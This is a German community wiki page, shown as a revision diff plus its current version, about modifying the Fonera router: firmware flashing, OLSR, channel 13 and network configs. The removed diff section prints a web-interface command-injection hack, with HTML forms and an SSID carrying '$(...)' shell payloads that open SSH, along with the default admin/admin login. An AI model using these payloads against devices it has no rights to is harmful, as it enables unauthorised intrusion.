Fonera: Unterschied zwischen den Versionen

Aus FunkFeuer Wiki
Wechseln zu: Navigation, Suche
(nach Hause telefonieren Teil 1 - Startup Script vergessen (sry))
(Die Version von FreiFunk (Sven Ola))
 
(54 dazwischenliegende Versionen von 14 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 +
<google>WIKI</google>
 +
 +
=About=
 
Adrian Dabrowski hat auf der Funkfeuer Convention am 24.11.2006 einen Vortrag über Hardware Hacking gehalten, in dem es auch um die Fonera ging. Die Folien kann man hier downloaden:  
 
Adrian Dabrowski hat auf der Funkfeuer Convention am 24.11.2006 einen Vortrag über Hardware Hacking gehalten, in dem es auch um die Fonera ging. Die Folien kann man hier downloaden:  
  
 
http://convention.funkfeuer.at/wp-content/uploads/funkfeuer-convention-hardware-hacking-adrian-dabrowski.pdf
 
http://convention.funkfeuer.at/wp-content/uploads/funkfeuer-convention-hardware-hacking-adrian-dabrowski.pdf
  
=About=
+
 
 +
 
 
Die Fonera ist ein Wlan Router, der von http://www.fon.com verwendet wird, um mit dem Internetzugang anderer Leute Geld zu verdienen.
 
Die Fonera ist ein Wlan Router, der von http://www.fon.com verwendet wird, um mit dem Internetzugang anderer Leute Geld zu verdienen.
  
Die Fonera kostet $/€ 29,95 und ist damit eigendlich recht günstig.
+
Die Fonera kostet € 34,44 und ist damit im Bereich der günstigeren Router
  
  
Zeile 46: Zeile 50:
 
* Low Cost
 
* Low Cost
  
=Hacking=
+
=Flashen=
es gibt 2 wesentliche Methoden, wie man in die Fonera kommt, das Ziel ist aber immer das Gleiche:
+
==Die Version von FreiFunk (Sven Ola)==
 +
'''es wurde bereits eine ausgereifte Version von FreiFunk entwickelt'''
 +
hier zu finden:
  
eine Console mit root-Rechten zu erhalten
+
[http://ipkg.funkfeuer.at/freifunk/fonera/ http://ipkg.funkfeuer.at/freifunk/fonera/]  [http://ipkg.funkfeuer.at/freifunk/fonera/README.txt README]
  
Es ist nützlich, sich zuerst die Methoden anzusehen, und dann eine auszuwählen.
+
bzw.
  
==Übersicht==
+
[http://download.berlin.freifunk.net/fonera/ http://download.berlin.freifunk.net/fonera/] [http://download.berlin.freifunk.net/fonera/README.txt README]
FON hat in die Fonera einiges an Software hineingepackt, die "nach Hause telefoniert", um Updates einzuspielen, und als Heartbeat, das gilt es erst mal zu deaktivieren, FON könnte ja Updates einspielen.
+
  
==Serielle Console==
 
die Fonera hat im Inneren eine Stiftleiste, auf der eine Serielle Konsole mit 3,3V pegel liegt.
 
  
[[Bild:Fonera_serial.jpg]]
+
'''GUTES HOW-TO dazu: http://wiki.freifunk-hannover.de/Fonera_mit_OLSR'''
* VCC (3.3V) – red
+
* GND – blue
+
* RX – white
+
* TX – orange
+
  
 +
Wichtig: Aktivierung von '''IPv4Broadcast''':
  
Aufgrund der 3,3V kann man die Fonera nicht direkt an einen PC anstecken, man braucht dazu erst einen Level Shifter.
+
mit z.b WinSCP auf dem Router einloggen und /etc/init.d/S83olsrd oder mit einem
 +
beliebigen Texteditor bearbeiten. zb vi
  
Geeignet ist der '''MAX3232'''
+
bei
  
Schaltbild:
+
Interface $FF_DEVS
 +
{
 +
        HelloInterval          6.0
 +
          ~
  
[[Bild:Serial-max3232.gif]]
+
ändern auf
 +
 +
Interface $FF_DEVS
 +
  {     
 +
        Ip4Broadcast 255.255.255.255
 +
        HelloInterval          6.0
 +
        ~
  
der MAX232, der einen konsolenpegel von 5V auf die Pegel des PCs bringt, funktioniert auch,
+
KANAL13 freischalten (fonera geht am besten auf den untersten kanälen auf 13 oft recht schlecht)
  man muss nur Vcc auf die 5V des netzteils anstatt der 3,3V der Stiftleiste legen
+
  
und nun starten wir auf dem PC/Laptop etc einen seriellen Konsolenclient mit den Einstellungen:
+
in /etc/modules.d/20-madwifi
  Speed 9600,n,8,1
+
ath_ahb
 +
ändern auf
 +
  ath_ahb countrycode=276
  
* Windows:
+
UND kanal 13 im webif einstellbar machen:  
Start>Programme>Zubehoer>Kommunikation>HyperTerminal
+
und dann eine neue Verbindung mit den obigen Einstellungen
+
  
* Linux:
+
in /www/cgi-bin/webif/adv_wifi.sh
picocom -b 9600 /dev/ttyUSB0
+
gilt bei USB-RS232 Kabel. Gegebenenfalls /dev/ttyS0 ... bei seriellem Kabel.
+
  
Jetzt, wo wir Shell Zugriff haben, was machen wir nun?
+
nach channels= suchen und folgendes ändern/hinzufuegen
===SSH Server===
+
 
als Erstes starten wir den SSH Server
+
#autokonfig disabled as it won`t work (reliable), and we don`t need all channels,..
  /etc/init.d/dropbear start
+
#channels=
Autostart für SSH Server einrichten
+
#for ch in $(iwlist ath1 freq | grep 'Channel ' | grep -v "reque" | awk '{print $2}'); do
  mv /etc/init.d/dropbear /etc/init.d/S50dropbear
+
#      channels="${channels:+$channels$N}option|$ch|$ch"
===Firewall===
+
#done
nun editieren wir die Firewall:
+
 
  vi /etc/firewall.user
+
  #check if channel 13 was enabled
 +
cc=`cat /etc/modules.d/20-madwifi|grep -c 276`
 +
  c=`cat /etc/modules.d/20-madwifi|grep -c ath_ahb`
 +
if [ "$cc" -eq "1" ]; then
 +
if [ "$c" -eq "1" ]; then
 +
w13="option|13|13"
 +
fi
 +
fi
 +
# fallback
 +
channels="${channels:-
 +
  option|01|01
 +
option|04|04
 +
option|07|07
 +
option|10|10
 +
$w13}"
  
mit '''i''' in den Insert-Mode gehen
+
==Experimentelle 0xFF Firmware auf OpenWRT Basis==
 +
Es gibt für die Fonera und Fonera+ eine experimentelle Firmware, die im Wesentlichen aus einem kamikaze + 0xFF spezifischer Konfiguration besteht. Details sind auf der Seite der [[Arbeitsgruppe_FoneraPlus]] zu finden.
  
die # vor den folgenden Zeilen wegnehmen:
+
Vorteil: Alle Sachen wie Ip4Broadcast, Kanal 13, etc funktionieren bereits mehr oder weniger out of the Box.
iptables -t nat -A prerouting_rule -i $WAN -p tcp—dport 22 -j ACCEPT
+
iptables -A input_rule -i $WAN -p tcp—dport 22 -j ACCEPT
+
'''ESC''' drücken, ''':wq''' eingeben und '''ENTER''' zum Speichern und den Editor zu verlassen
+
  
nun machen wir die Änderungen an der Firewall Aktiv:
+
Nachteil: Es gibt kein Webinterface. Um die Benutzung von ssh und einem Texteditor kommt man nicht herum.
/etc/firewall.user
+
===nach Hause telefonieren Teil 1===
+
Die Updatefunktion muss natürlich ausgeschaltet werden
+
  
hier editieren wir das Shell-Script, das das erledigt
+
= Power over Ethernet =
  
vi /bin/thinclient
+
die 2. Version der Fonera (2200 siehe Rückseite) mit 7,5V Stromanschluss (und schwarzem LAN Anschluss und dünnem Stecker)
  
und machen bei der letzten Zeile ein # davor
+
kann ohne Probleme mit bis zu 13V betrieben werden, da sie intern einen Schaltregler hat, der sehr effizient arbeitet und auch bei höheren Spannungen nicht viel Wärme erzeugt.
# . /tmp/.thinclient.sh
+
  
das script startet sich ausserdem noch beim Systemstart,
 
  
also /etc/init.d/N40thinclient in z.b /etc/init.d/noN40thinclient umbenennen
+
Achtung beim Stecker, der markierte Draht ist Masse, am besten aber nochmal nachmessen.
  
mv /etc/init.d/N40thinclient /etc/init.d/noN40thinclient
 
  
===nach Hause telefonieren Teil 2===
+
'''Die 1. Version (2100) kann nicht so einfach per POE betrieben werden, der Längsregler würde wahscheinlich sofort durchbrennen.'''
unser editiertes Shellscript wird jede Stunde aufgerufen, unser Edit hilft aber nur, das eigendliche Script, was der Server schickt zu deaktivieren.
+
  
wer sehen will, was FON mit der Fonera anstellen wollte, kann das was jetzt kommt gerne weglassen,
+
=Über den Ethernet-Port der Fonera ins Netz - Dirty Hack=
ich persöhnlich hasse allerdings Spionage.
+
== /etc/firewall.user ==
 +
  iptables -t nat -I PREROUTING -s 192.168.0.2 -j ACCEPT   
 +
  iptables -t nat -I POSTROUTING -s 192.168.0.2 -j MASQUERADE
 +
  iptables -I INPUT -s 192.168.0.2 -j ACCEPT
 +
  iptables -I FORWARD -s 192.168.0.2 -j ACCEPT
  
also editieren wir den cronjob:
+
== /etc/config/fon ==
 +
  #config network lan
 +
  #      option  mode    static
 +
  #      option  ipaddr  192.168.10.1
 +
  #      option  netmask 255.255.255.0
 +
  #      option  dhcp    1
 +
 
 +
 
 +
  config network wan
 +
        option mode    'static'
 +
        option ipaddr  '192.168.0.1'
 +
        option netmask  '255.255.255.0'
 +
  #    option gateway  '192.168.0.1'
 +
        option dns      '193.238.157.16'
  
in der Datei '''/etc/crontabs/root''' ist original folgendes eingetragen:
+
== Client Konfiguration ==
 +
  IP: 192.168.0.2
 +
  Netmask: 255.255.255.0
 +
  Gateway: 192.168.0.1
 +
  DNS: 193.238.157.16
  
0 * * * * /bin/thinclient cron
+
Voilá!
  
das editieren wir zu
+
== Zwei Router im Verbund ==
#0 * * * * /bin/thinclient cron
+
Um 2 Router per Kabel miteinander zu verbinden einfach die IP Adresse des WLAN Interfaces auch für das WAN verwenden.
oder löschen den Eintrag ganz hinaus
+
  
wir könnten zwar auch den crond stoppen, allerdings braucht Sven-Ola's OLSR paket einen cronjob
+
Nun per ssh auf den ersten Router verbinden und die Datei /etc/config/fon editieren.
===nach Hause telefonieren Teil 3===
+
#config network lan
ja, die FON-Leute sind echt nervend ;-)
+
#      option  mode    static
es verbirgt sich noch ein kleiner heartbeat in '''/etc/init.d/N10conncheck'''
+
#      option  ipaddr  192.168.10.1
 +
#      option  netmask 255.255.255.0
 +
#      option  dhcp    1
  
also
+
config network wan
  vi /etc/init.d/N10conncheck
+
      option mode    'static'
 +
      option ipaddr  '193.238.156.X' (Funkfeuer Adresse des Routers)
 +
      option netmask '255.255.252.0' (oder auch 255.255.255.0 bei einer 78.41.112.X Addresse)
 +
#    option gateway  '193.238.0.1'
 +
      option dns      '193.238.157.16'
 +
      option gateway  ''
  
und folgende Zeilen auskommentieren oder löschen:
+
Nun muss noch eine Firewall Regel erstellt werden die den Tarffic ungefilter weiterleitet.
 +
Dazu die Datei /etc/firewall.user um die folgenden Zeilen ergänzen.
  
  while [ -z "$(/usr/bin/wget "http://download.fon.com/heartbeat.php" -O-)" ]; do
+
  iptables -I INPUT  -i eth0 -j ACCEPT
sleep 1
+
  iptables -I OUTPUT -o eth0 -j ACCEPT
  done
+
  
==Webinterface==
+
Jetzt fehlt nur noch OLSR auf dem WAN Port zu aktivieren.
  
ACHTUNG: habe unlängst eine weitere fonera bekommen, und versucht per Webhack reinzukommen, hat nicht mehr funktioniert.
+
Dazu wird das Skript /etc/init.d/S83olsrd editiert.
FON hat anscheinend (endlich) einen Patch dagegen aufgespielt
+
dieser hack funktioniert somit nur mit alten Versionen, am Besten ausprobieren
+
ansonsten kann man auch beim FONERA Hacking Part IV weiter gehn, das ging bei meiner Fonera.
+
Wie lang es dauert bis FON den bug gefixt kann keiner sagen, bei mir hats funktioniert (Mitte Jan 2007)
+
  
hier nutzen wir einen Bug im AdminInterface
+
Interface $FF_DEVS "eth0"
 +
{
  
der Trick ist, dass wir hier einen Bug ausnützen.
+
Nun muss der ganze Vorgang noch für den zweiten Router wiederholt werden.
wir können nämlich in Eingabefeldern Befehle hineinschreiben, ohne dass die software das erkennt und abbricht.
+
 
+
bei einem marktreifen Produkt sollte sowas wirklich nicht sein!!
+
 
+
nahut, gehn wirs an.
+
 
+
dazu erstellen wir uns erst einmal 2 HTML files:
+
 
+
'''seite1.html:'''
+
 
+
<code><nowiki>
+
  <html>
+
  <head></head><body><center>
+
  <form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
+
  <input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp –dport 22 -j ACCEPT)" size="68" />
+
  <input type="submit" name="submit" value="Submit" />
+
  </form>
+
  </center></body></html>
+
</nowiki></code>
+
 
+
'''seite2.html:'''
+
 
+
<code><nowiki>
+
  <html>
+
  <head></head><body><center>
+
  <form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
+
  <input name="username" value="$(/etc/init.d/dropbear)" size="68" ><input type="submit" name="submit" value="Submit" />
+
  </form>
+
  </center></body></html>
+
</nowiki></code>
+
 
+
nun stellen wir die LAN-Verbindung des PC/Laptops ein:
+
IP: 169.254.255.2
+
Subnet mask: 255.255.255.0
+
 
+
nun kann es losgehen:
+
 
+
'''Seite 1''' aufrufen und auf Submit drücken.
+
 
+
am FON router einloggen
+
Default Login:
+
username: admin
+
passwort: admin
+
 
+
nun sieht man wahrscheinlich HTML quelltext im browser, auch das permission denied ganz oben ist normal.
+
 
+
 
+
nun '''Seite2''' aufrufen und auf Submit drücken.
+
===SSH Server===
+
wenn nun alles geklappt hat kann man mit putty auf '''169.254.255.1''' connecten.
+
dort als root und mit dem Passwort einloggen.
+
 
+
nun kommt im Grunde fast das Selbe wie bei Serieller Verbindung, nur dass wir einiges eben gerade eh schon gestartet haben.
+
 
+
Autostart für SSH Server einrichten
+
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
+
===Firewall===
+
nun editieren wir die Firewall:
+
vi /etc/firewall.user
+
 
+
mit i in den Insert-Mode gehen
+
 
+
die # vor den folgenden Zeilen wegnehmen:
+
iptables -t nat -A prerouting_rule -i $WAN -p tcp—dport 22 -j ACCEPT
+
iptables -A input_rule -i $WAN -p tcp—dport 22 -j ACCEPT
+
ESC drücken, :wq eingeben und ENTER zum Speichern und den Editor zu verlassen
+
 
+
nun machen wir die Änderungen an der Firewall Aktiv:
+
/etc/firewall.user
+
===nach Hause telefonieren Teil 1===
+
Die Updatefunktion muss natürlich ausgeschaltet werden
+
 
+
hier editieren wir das Shell-Script, das das erledigt
+
 
+
vi /bin/thinclient
+
 
+
und machen bei der letzten Zeile ein # davor
+
# . /tmp/.thinclient.sh
+
 
+
 
+
das script startet sich ausserdem noch beim Systemstart,
+
 
+
also /etc/init.d/N40thinclient in z.b /etc/init.d/noN40thinclient umbenennen
+
 
+
mv /etc/init.d/N40thinclient /etc/init.d/noN40thinclient
+
 
+
===nach Hause telefonieren Teil 2===
+
unser editiertes Shellscript wird jede Stunde aufgerufen, unser Edit hilft aber nur, das eigendliche Script, was der Server schickt zu deaktivieren.
+
 
+
wer sehen will, was FON mit der Fonera anstellen wollte, kann das was jetzt kommt gerne weglassen,
+
ich persöhnlich hasse allerdings Spionage.
+
 
+
also editieren wir den cronjob:
+
 
+
in der Datei '''/etc/crontabs/root''' ist original folgendes eingetragen:
+
 
+
0 * * * * /bin/thinclient cron
+
 
+
EDIT: seit einiger zeit ist auch schon ein NTP client dabei, der von ntp1.linuxmedialabs.com updatet
+
 
+
das editieren wir zu
+
#0 * * * * /bin/thinclient cron
+
oder löschen den Eintrag ganz hinaus
+
 
+
wir könnten zwar auch den crond stoppen, allerdings braucht Sven-Ola's OLSR paket einen cronjob
+
 
+
===nach Hause telefonieren Teil 3===
+
ja, die FON-Leute sind echt nervend ;-)
+
es verbirgt sich noch ein kleiner heartbeat in '''/etc/init.d/N10conncheck'''
+
 
+
also
+
vi /etc/init.d/N10conncheck
+
 
+
und folgende Zeilen auskommentieren oder löschen:
+
 
+
while [ -z "$(/usr/bin/wget "http://download.fon.com/heartbeat.php" -O-)" ]; do
+
sleep 1
+
done
+
 
+
==FONERA Hacking Part IV by datacop :-)==
+
 
+
ich (datacop) hab durch ausprobieren einen weiteren Bug gefunden, der sehr elegant ist :-)
+
 
+
Addresseinstellungen wie bei obigen Hack:
+
IP: 169.254.255.2
+
Subnet mask: 255.255.255.0
+
 
+
der Trick:
+
 
+
bei Public Wireless Settings einfach in die SSID folgendes eintragen:
+
 
+
$(/etc/init.d/dropbear)
+
 
+
dann abschicken und schon kann man beim Webinterfacehack bei SSH Server weiter machen.
+
  
 
=Links=
 
=Links=
Zeile 321: Zeile 223:
  
 
http://www.easy2design.de/bla/?page_id=98 - Wenn der Fonera die KernelPanic-Krankheit hat: Debricking and more :)
 
http://www.easy2design.de/bla/?page_id=98 - Wenn der Fonera die KernelPanic-Krankheit hat: Debricking and more :)
 +
 +
http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing#Flashing - Fonera auf DD-WRT flashen (expert section)
 +
 +
http://mrmuh.blogspot.com/2006/11/updates-explained-and-bridging-mode.html - Brigding mit der Fonera (Interessant für Nutzung als WLAN-AP oder im Client-Mode (bridge) )
 +
 +
http://www.dd-wrt.com/wiki/index.php/LaFonera_Hardware_32MB_SDRAM_MOD - Nette sahe fuer bastler ;o)
 +
 +
http://www.dd-wrt.com/phpBB2/viewtopic.php?t=14747&highlight=olsr - DD-WRT mit OLSR !
 +
ich hab OLSR mit DD-WRT nicht zum Laufen gebracht, Erfahrungsberichte? --[[Benutzer:Datacop|datacop]] 14:46, 21. Okt 2007 (CEST)
 +
 +
[[Category:Dokumentation]]
 +
[[Category:Hardware]]

Aktuelle Version vom 10. Januar 2011, 11:45 Uhr

<google>WIKI</google>

About

Adrian Dabrowski hat auf der Funkfeuer Convention am 24.11.2006 einen Vortrag über Hardware Hacking gehalten, in dem es auch um die Fonera ging. Die Folien kann man hier downloaden:

http://convention.funkfeuer.at/wp-content/uploads/funkfeuer-convention-hardware-hacking-adrian-dabrowski.pdf


Die Fonera ist ein Wlan Router, der von http://www.fon.com verwendet wird, um mit dem Internetzugang anderer Leute Geld zu verdienen.

Die Fonera kostet € 34,44 und ist damit im Bereich der günstigeren Router


es gibt schon einige Möglichkeiten die Fonera Firmware zu ändern,

zum Beispiel einfach das bestehende Betriebsystem verändern,

es gibt jedoch auch schon Lösungen die ein komplett neues Betriebssystem aufspielen.

Es wird wohl nicht mehr lange dauern, bis fertige Software zur Verfügung steht, wie es bei den Linksysen bekannt ist, die Frage ist, ob FON nicht einiges dagegen unternehmen wird, z.b Änderung der Hardware.

Wichtig ist deshalb, dass man eine neue Fonera nicht erst ins Internet lässt, sondern gleich "bearbeitet"

Nachteile

  • die Fonera ist eigendlich nicht dazu gedacht, dass man damit herumspielt, deshalb kommt man nur über Tricks hinein
  • die Fonera hat ein extrem langsames Flash, das booten dauert länger als das Flashen bei einem WRT54GL ;-)
  • die Pakete die es momentan gibt, sind fast alle experimentell, deshalb gibt es noch keine Webinterfaces etc. (es wird daran aber schon sehr intensiv gearbeit)
  • die Originalfirmware ist auf USA eingestellt, damit sind nur die Kanäle 1-11 verfügbar, es wird daran gearbeitet...

Systemeigenschaften im Originalzustand

Software

  • Linux 2.4.36
  • 2 WIFI Netze
    • Privat, WPA, Lokales LAN + Internet
    • Public, Captive Portal, nur Internet
  • Captive Portal: Chilli
  • “Phoning Home”

Hardware

  • MIPS CPU
  • Router600mA @ 5V (3W)
  • Atheros Chipset -> Linux MADWIFI
  • PSMA Antenne, 2,2dbi
  • Atheros -90/-93dbm.
 zum Vergleich: Linksys -65dBm@54Mbps, -80dBm@11Mbps
  • 8 MB Serial Flash / 16 MB Flash
  • Low Cost

Flashen

Die Version von FreiFunk (Sven Ola)

es wurde bereits eine ausgereifte Version von FreiFunk entwickelt hier zu finden:

http://ipkg.funkfeuer.at/freifunk/fonera/ README

bzw.

http://download.berlin.freifunk.net/fonera/ README


GUTES HOW-TO dazu: http://wiki.freifunk-hannover.de/Fonera_mit_OLSR

Wichtig: Aktivierung von IPv4Broadcast:

mit z.b WinSCP auf dem Router einloggen und /etc/init.d/S83olsrd oder mit einem beliebigen Texteditor bearbeiten. zb vi

bei

Interface $FF_DEVS
{
        HelloInterval           6.0
         ~
ändern auf 

Interface $FF_DEVS
  {       
       Ip4Broadcast 255.255.255.255
       HelloInterval           6.0
       ~

KANAL13 freischalten (fonera geht am besten auf den untersten kanälen auf 13 oft recht schlecht)

in /etc/modules.d/20-madwifi

ath_ahb 

ändern auf

ath_ahb countrycode=276

UND kanal 13 im webif einstellbar machen:

in /www/cgi-bin/webif/adv_wifi.sh

nach channels= suchen und folgendes ändern/hinzufuegen

#autokonfig disabled as it won`t work (reliable), and we don`t need all channels,..
#channels=
#for ch in $(iwlist ath1 freq | grep 'Channel ' | grep -v "reque" | awk '{print $2}'); do
#       channels="${channels:+$channels$N}option|$ch|$ch"
#done
 
#check if channel 13 was enabled
cc=`cat /etc/modules.d/20-madwifi|grep -c 276`
c=`cat /etc/modules.d/20-madwifi|grep -c ath_ahb`
if [ "$cc" -eq "1" ]; then
if [ "$c" -eq "1" ]; then
w13="option|13|13"
fi
fi
# fallback
channels="${channels:-
option|01|01
option|04|04
option|07|07
option|10|10
$w13}"

Experimentelle 0xFF Firmware auf OpenWRT Basis

Es gibt für die Fonera und Fonera+ eine experimentelle Firmware, die im Wesentlichen aus einem kamikaze + 0xFF spezifischer Konfiguration besteht. Details sind auf der Seite der Arbeitsgruppe_FoneraPlus zu finden.

Vorteil: Alle Sachen wie Ip4Broadcast, Kanal 13, etc funktionieren bereits mehr oder weniger out of the Box.

Nachteil: Es gibt kein Webinterface. Um die Benutzung von ssh und einem Texteditor kommt man nicht herum.

Power over Ethernet

die 2. Version der Fonera (2200 siehe Rückseite) mit 7,5V Stromanschluss (und schwarzem LAN Anschluss und dünnem Stecker)

kann ohne Probleme mit bis zu 13V betrieben werden, da sie intern einen Schaltregler hat, der sehr effizient arbeitet und auch bei höheren Spannungen nicht viel Wärme erzeugt.


Achtung beim Stecker, der markierte Draht ist Masse, am besten aber nochmal nachmessen.


Die 1. Version (2100) kann nicht so einfach per POE betrieben werden, der Längsregler würde wahscheinlich sofort durchbrennen.

Über den Ethernet-Port der Fonera ins Netz - Dirty Hack

/etc/firewall.user

 iptables -t nat -I PREROUTING -s 192.168.0.2 -j ACCEPT     
 iptables -t nat -I POSTROUTING -s 192.168.0.2 -j MASQUERADE
 iptables -I INPUT -s 192.168.0.2 -j ACCEPT
 iptables -I FORWARD -s 192.168.0.2 -j ACCEPT

/etc/config/fon

 #config network lan
 #       option  mode    static
 #       option  ipaddr  192.168.10.1
 #       option  netmask 255.255.255.0
 #       option  dhcp    1
 
 
 config network wan
       option mode     'static'
       option ipaddr   '192.168.0.1'
       option netmask  '255.255.255.0'
 #     option gateway  '192.168.0.1'
       option dns      '193.238.157.16'

Client Konfiguration

 IP: 192.168.0.2
 Netmask: 255.255.255.0
 Gateway: 192.168.0.1
 DNS: 193.238.157.16

Voilá!

Zwei Router im Verbund

Um 2 Router per Kabel miteinander zu verbinden einfach die IP Adresse des WLAN Interfaces auch für das WAN verwenden.

Nun per ssh auf den ersten Router verbinden und die Datei /etc/config/fon editieren.

#config network lan
#       option  mode    static
#       option  ipaddr  192.168.10.1
#       option  netmask 255.255.255.0
#       option  dhcp    1
config network wan
      option mode     'static'
      option ipaddr   '193.238.156.X' (Funkfeuer Adresse des Routers)
      option netmask  '255.255.252.0' (oder auch 255.255.255.0 bei einer 78.41.112.X Addresse)
#     option gateway  '193.238.0.1'
      option dns      '193.238.157.16'
      option gateway  

Nun muss noch eine Firewall Regel erstellt werden die den Tarffic ungefilter weiterleitet. Dazu die Datei /etc/firewall.user um die folgenden Zeilen ergänzen.

iptables -I INPUT  -i eth0 -j ACCEPT
iptables -I OUTPUT -o eth0 -j ACCEPT

Jetzt fehlt nur noch OLSR auf dem WAN Port zu aktivieren.

Dazu wird das Skript /etc/init.d/S83olsrd editiert.

Interface $FF_DEVS "eth0"
{

Nun muss der ganze Vorgang noch für den zweiten Router wiederholt werden.

Links

http://jauzsi.hu/2006/10/13/inside-of-the-fonera

http://wiki.freifunk-hannover.de/Fonera_mit_OLSR - FreiFunk Hannover WIKI

http://www.mariomix.net/mariomix-blog/2006/11/hacking-la-fonera-parte-3/ - Hacking Part 3

http://www.notmart.org/index.php/BlaBla/Hacking_la_fonera..._part_III - noch eine Anleitung Hacking Part 3, englisch

http://bingobommel.blogspot.com/ - Hacking Part 2

http://olsrexperiment.de/sven-ola/fonera/ - Sven-Ola's Pakete, OLSR

http://fon.rogue.be/lafonera-0.7.0-rev4/

http://fon.rogue.be/lafonera/

http://fon.rogue.be/lafonera-experimental/

http://www.art-xtreme.com/blog/20061017/activar-ssh-en-la-fonera/ - Serieller Hack

http://www.easy2design.de/bla/?page_id=98 - Wenn der Fonera die KernelPanic-Krankheit hat: Debricking and more :)

http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing#Flashing - Fonera auf DD-WRT flashen (expert section)

http://mrmuh.blogspot.com/2006/11/updates-explained-and-bridging-mode.html - Brigding mit der Fonera (Interessant für Nutzung als WLAN-AP oder im Client-Mode (bridge) )

http://www.dd-wrt.com/wiki/index.php/LaFonera_Hardware_32MB_SDRAM_MOD - Nette sahe fuer bastler ;o)

http://www.dd-wrt.com/phpBB2/viewtopic.php?t=14747&highlight=olsr - DD-WRT mit OLSR !

ich hab OLSR mit DD-WRT nicht zum Laufen gebracht, Erfahrungsberichte? --datacop 14:46, 21. Okt 2007 (CEST)